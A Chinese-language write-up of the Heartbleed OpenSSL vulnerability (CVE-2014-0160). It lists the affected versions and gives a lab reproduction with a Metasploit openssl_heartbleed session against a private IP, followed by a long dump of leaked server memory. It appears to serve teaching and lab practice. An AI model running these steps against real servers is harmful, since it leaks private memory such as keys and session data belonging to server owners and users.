心脏滴血漏洞 CVE-2014-0160

漏洞描述
影响版本
漏洞复现

漏洞描述 #

2014年4月7日，OpenSSL发布安全公告，在OpenSSL1.0.1版本至OpenSSL1.0.1f Beta1版本中存在漏洞，该漏洞中文名称为心脏滴血，英文名称为HeartBleed。其中Heart是指该漏洞位于心跳协议上，Bleed是因为该漏洞会造成数据泄露。即HeartBleed是在心跳协议上的一个数据泄露漏洞，OpenSSL库中用到了该心跳协议。HeartBleed主要存在与OpenSSL的1.0.1版本到1.0.1f版本。

影响版本 #

OpenSSL1.0.1、1.0.1a、1.0.1b、1.0.1c、1.0.1d、1.0.1e、1.0.1f、Beta 1 of OpenSSL 1.0.2等版本

漏洞复现 #

使用Nmap检测脚本对目标进行检测

检测到心脏滴血漏洞，使用MSF对目标进行攻击

msf5 > use auxiliary/scanner/ssl/openssl_heartbleed
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > show options

Module options (auxiliary/scanner/ssl/openssl_heartbleed):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   DUMPFILTER                         no        Pattern to filter leaked memory before storing
   LEAK_COUNT        1                yes       Number of times to leak memory per SCAN or DUMP invocation
   MAX_KEYTRIES      50               yes       Max tries to dump key
   RESPONSE_TIMEOUT  10               yes       Number of seconds to wait for a server response
   RHOSTS                             yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT             443              yes       The target port (TCP)
   STATUS_EVERY      5                yes       How many retries until key dump status
   THREADS           1                yes       The number of concurrent threads (max one per host)
   TLS_CALLBACK      None             yes       Protocol to use, "None" to use raw TLS sockets (Accepted: None, SMTP, IMAP, JABBER, POP3, FTP, POSTGRES)
   TLS_VERSION       1.0              yes       TLS/SSL version to use (Accepted: SSLv3, 1.0, 1.1, 1.2)


Auxiliary action:

   Name  Description
   ----  -----------
   SCAN  Check hosts for vulnerability


msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set rhost 192.168.51.133
rhost => 192.168.51.133
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set  verbose true
verbose => true
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > run
                                                                                                                                                                                                                                           
[*] 192.168.51.133:443    - Leaking heartbeat response #1                                                                                                                                                                                  
[*] 192.168.51.133:443    - Sending Client Hello...                                                                                                                                                                                        
[*] 192.168.51.133:443    - SSL record #1:                                                                                                                                                                                                 
[*] 192.168.51.133:443    -     Type:    22                                                                                                                                                                                                
[*] 192.168.51.133:443    -     Version: 0x0301                                                                                                                                                                                            
[*] 192.168.51.133:443    -     Length:  86                                                                                                                                                                                                
[*] 192.168.51.133:443    -     Handshake #1:                                                                                                                                                                                              
[*] 192.168.51.133:443    -             Length: 82                                                                                                                                                                                         
[*] 192.168.51.133:443    -             Type:   Server Hello (2)                                                                                                                                                                           
[*] 192.168.51.133:443    -             Server Hello Version:           0x0301                                                                                                                                                             
[*] 192.168.51.133:443    -             Server Hello random data:       5fd46996727a4e50c0e2eaecf52d1592384aaa6870d4d65eea8b6b34eb47a389
[*] 192.168.51.133:443    -             Server Hello Session ID length: 32
[*] 192.168.51.133:443    -             Server Hello Session ID:        66e9cacbefcb28955de31c38bd9dff93de153a6d6247fa117ebc3f2f091d6f74
[*] 192.168.51.133:443    - SSL record #2:
[*] 192.168.51.133:443    -     Type:    22
[*] 192.168.51.133:443    -     Version: 0x0301
[*] 192.168.51.133:443    -     Length:  822
[*] 192.168.51.133:443    -     Handshake #1:
[*] 192.168.51.133:443    -             Length: 818
[*] 192.168.51.133:443    -             Type:   Certificate Data (11)
[*] 192.168.51.133:443    -             Certificates length: 815
[*] 192.168.51.133:443    -             Data length: 818
[*] 192.168.51.133:443    -             Certificate #1:
[*] 192.168.51.133:443    -                     Certificate #1: Length: 812
[*] 192.168.51.133:443    -                     Certificate #1: #<OpenSSL::X509::Certificate: subject=#<OpenSSL::X509::Name CN=localhost,O=Dis,L=Springfield,ST=Denial,C=US>, issuer=#<OpenSSL::X509::Name CN=localhost,O=Dis,L=Springfield,ST=Denial,C=US>, serial=#<OpenSSL::BN:0x00007efe8154c028>, not_before=2020-08-09 17:03:46 UTC, not_after=2021-08-09 17:03:46 UTC>
[*] 192.168.51.133:443    - SSL record #3:
[*] 192.168.51.133:443    -     Type:    22
[*] 192.168.51.133:443    -     Version: 0x0301
[*] 192.168.51.133:443    -     Length:  331
[*] 192.168.51.133:443    -     Handshake #1:
[*] 192.168.51.133:443    -             Length: 327
[*] 192.168.51.133:443    -             Type:   Server Key Exchange (12)
[*] 192.168.51.133:443    - SSL record #4:
[*] 192.168.51.133:443    -     Type:    22
[*] 192.168.51.133:443    -     Version: 0x0301
[*] 192.168.51.133:443    -     Length:  4
[*] 192.168.51.133:443    -     Handshake #1:
[*] 192.168.51.133:443    -             Length: 0
[*] 192.168.51.133:443    -             Type:   Server Hello Done (14)
[*] 192.168.51.133:443    - Sending Heartbeat...
[*] 192.168.51.133:443    - Heartbeat response, 65535 bytes
[+] 192.168.51.133:443    - Heartbeat response with leak, 65535 bytes
[*] 192.168.51.133:443    - Printable info leaked:
......_...DV.....G...{.vc..i ..Gv.'....f.....".!.9.8.........5.............................3.2.....E.D...../...A.......................................w.....#.'.g.@.r.v.........8.........2.....E.D.......Q.......P.=...<.......A...............................#.............*.(.........................................+........-.....3.&.$... 3.<.]...et1......L.D.L%*.V8....{............................................................................................................................................jectReference" type="ServiceInstance">ServiceInstance</_this></RetrieveServiceContent></soap:Body></soap:Envelope>W&V.b...?....|.y..................................................................................................................................... repeated 15479 times .....................................................................................................................................@..................................................................................................................................... repeated 16122 times .....................................................................................................................................@.................................................................................................................................................................................................................................................................................................................................QA......h.......h.........7.RV....7.RV..................................................................................................................................... repeated 4129 times .....................................................................................................................................0......X.......X.........................7.RV..............................RV..=.c.RV.. .7.RV..x.7.RV....7.RV....7.RV..x.7.RV..x.7.RV..h.7.RV....7.RV....7.RV..192.168.51.146 - - [12/Dec/2020:06:47:40 +0000] "POST /sdk HTTP/1.1" 404 170 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)".org/book/nse.html)"..................................................................................................................................... repeated 3184 times .....................................................................................................................................Q ........................7.RV....7.RV..................................................................................................................................... repeated 7539 times .....................................................................................................................................@..........................................................................................................................................................................................................................................................................................................................................@.......................................................................................................................................................................................................$4.RV..................................@....... .......0.8.RV..........`.......0........$4.RV..jfx...&...~.RV..........PA......`....... '..RV..@d4.RV....................2.RV....................2.RV..........................1.................8.RV..........................1...............................................!...............h....... ...............m..U`.W.....O.>c.....E^X4........kr[..:.1...z[..x.W].........f...3h.qS.&K.(A*q*...].tx.b....X........Np....l.F...5....~..Z2.D..$........................................................................................................................................1.......x.......x.......P.2.RV....2.RV..0.......0.......>#NQ[.8.].......&.i2y.x.I....iOk........a....... '..RV..`.2.RV..................0.2.RV....................2.RV......................;P.e.........................U.6.&`.Ks..w>V.. ^..N..z....z...M.+..n/i..C...D......a..2.p..<.....}k.W:.Eq....Ui*I.X...m...-..x..3}.5NM............... .......P.2.RV..................1.........t.............................0....................V..>...I5.F......!.3Xhy.4.....r.....h.d..b........).......3.....&......IE...c,8.T.~..H.P.{y.....CK.,!&..;..vw....H.C...q....%e..{.XT.jq.R.r.....RHw..57.COlB..|......@...*.G(3..-N..P....mLO..]./.,9..|..+2.Lh..q..dF.m...'.....`...S.8........Q...U.0....I................................................................................................................................................................................................................................................................................ '..RV.. .8.RV..`.2.RV....................8.RV.................................. .2.RV....................2.RV............................................2.RV....................2.RV.......................... .2.RV.. .2.RV..................h.......h.........8.RV....8.RV..................................................................................................................................... repeated 745 times .....................................................................................................................................#8.RV..`.2.RV........!.3Xhy.4.....r.....h.d..b........).......3.....&......IE...c,8.T.~..H.P.{y.....CK.,!&..;..vw....H.C...q....%e..{.XT.jq.R.r.....RHw..57.COlB..|......@...*.G(3..-N..P....mLO..]./.,9..|..+2.Lh..q..dF.m...'.....`...S.8........Q...U.0....I ..................................................................................................................................... repeated 277 times .....................................................................................................................................X.......`.2.RV..........................................................P...........RV............................................................................................................................................................................................................................................................................................................................................2.RV..X..................................................................................................................................... repeated 437 times .....................................................................................................................................A.......X.........1.RV..................................................................................................................................................................................................................................................................................................................................X.......X..................................................................................................................................... repeated 429 times .....................................................................................................................................x.......!.......X.......X..................................................................................................................................... repeated 1942 times .....................................................................................................................................@..........V...R.._.i.rzNP.....-..8J.hp..^..k4.G.. f.....(.]..8......:mbG..~.?/..ot...................6...2../..,0..(0...........j..0...*.H........0V1.0...U....US1.0...U....Denial1.0...U....Springfield1.0...U....Dis1.0...U....localhost0...200809170346Z..210809170346Z0V1.0...U....US1.0...U....Denial1.0...U....Springfield1.0...U....Dis1.0...U....localhost0.."0...*.H.............0.........8...;....../t.....^.....P..=....w.*b.a>.8.Q.?.$.c.......{G. ........l..i...D..V....0......B..J..Y.c.wO.....M.Df..R....".4.u...............P.><7d}VK4^.$.S..U..u..R7l.+.H....;.V.w.?..).........[....M..3......?..e...WBI^..&.'.nhV!.......V.;...y..+&tm.c1..3-.....0...*.H..............>.c..|.s(......,..H.1..0.=l`...(2..Sb.......`...c....5J....v..uj.*^i.$6^..a3.s.......v.......M.pK.9....t.&...|y...u1.......u..M..%.+..{e....G..~.v.D.6...............=).3{......r/."vz..a.U..5-.5.=......l..ud......Nx...n..$h...4.G.~b.LU.Y...37..e....%.w.......K...G...A....~m.h,......qz>}uA.^)..A.&}o@..'...y.]..V..S..JY........Y/.u|....$.n.T._.b\c...o.]....L.h...v*....z..D..?Kq9hJ.kT....?.....=......su....p.S...j.e.....-N}.S...x..Z.....t.;Z...n=.1.......J.1n.l...w. .l.d.W. .........8..`.>O........t...r..~.A$..R...v.8......x.o<.....#hS......Vz.6....V..l....-.....,n...p.(..L.w.7h3...3..................................................................................................................................... repeated 6250 times .....................................................................................................................................
[*] 192.168.51.133:443    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed